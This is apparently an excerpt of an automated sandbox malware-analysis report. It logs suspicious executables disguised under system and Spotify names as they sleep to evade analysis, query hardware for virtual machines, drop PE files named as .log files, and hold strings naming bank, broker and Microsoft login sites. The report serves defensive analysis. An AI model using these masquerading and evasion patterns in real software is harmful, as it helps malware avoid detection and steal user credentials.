                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596642
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596500
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 300000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596375
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596266
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596141
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596031
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595890
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595594
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595465
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595355
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593344
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593230
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593124
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593013
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592906
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592797
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWindow / User API: threadDelayed 4390Jump to behavior
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWindow / User API: threadDelayed 3687
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWindow / User API: threadDelayed 6019
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\Rlqiwetw.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\jWsFKvpe.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\LWyBOcEb.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\PMosVZFV.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\vRRUHqel.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\clyyMyKw.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\GFwKqCZT.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\DUQujoOa.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\XUwHpYfn.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\wcHMhvIM.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\YjeiZtnk.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\sMvnZGVS.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\eKApnDyW.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\YqxhFSUC.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599874s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599764s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599655s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599547s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599437s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599324s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -100000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99891s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99782s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99657s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99532s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99407s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99297s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99188s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99063s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -98938s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -98801s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -98522s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597500s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597382s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597265s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597156s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 7048Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 6692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe TID: 7300Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe TID: 7316Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 7276Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 7236Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -24903104499507879s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -600000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -599875s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -599610s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -599438s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 5508Thread sleep time: -10800000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598938s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598766s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598610s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598250s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597985s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597860s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597749s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597640s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597526s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597415s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597130s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597016s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596820s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596642s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596500s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 5508Thread sleep time: -1200000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596375s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596266s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596141s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596031s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595890s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595594s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595465s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595355s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595250s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -100000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99872s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99763s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99204s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99031s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98917s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98802s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98685s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98578s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98464s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98359s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98250s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593344s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593230s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593124s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593013s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -592906s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -592797s >= -30000s
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 7344Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe TID: 7444Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe TID: 7372Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599874Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599764Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599655Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599547Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599437Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599324Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 100000Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99891Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99782Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99657Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99532Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99407Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99297Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99188Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99063Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 98938Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 98801Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 98522Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597500Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597382Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597265Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597156Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 30000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599875
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599438
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598938
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598766
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597985
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597860
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597749
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597640
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597526
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597415
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597130
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597016
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596820
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596642
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596500
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 300000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596375
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596266
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596141
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596031
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595890
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595594
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595465
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595355
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 100000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99872
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99763
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99204
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99031
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98917
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98802
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98685
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98578
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98464
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98359
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593344
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593230
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593124
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593013
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592906
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592797
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                              Source: knl7bHUrFR.29.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                              Source: knl7bHUrFR.29.drBinary or memory string: discord.comVMware20,11696487552f
                              Source: knl7bHUrFR.29.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                              Source: knl7bHUrFR.29.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                              Source: knl7bHUrFR.29.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: global block list test formVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: tasks.office.comVMware20,11696487552o
                              Source: knl7bHUrFR.29.drBinary or memory string: AMC password management pageVMware20,11696487552
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1275218813.000000001BEA0000.00000004.00000020.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2478824169.000000001B200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1314505737.000001BF8F267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: knl7bHUrFR.29.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                              Source: knl7bHUrFR.29.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: dev.azure.comVMware20,11696487552j
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                              Source: knl7bHUrFR.29.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                              Source: knl7bHUrFR.29.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
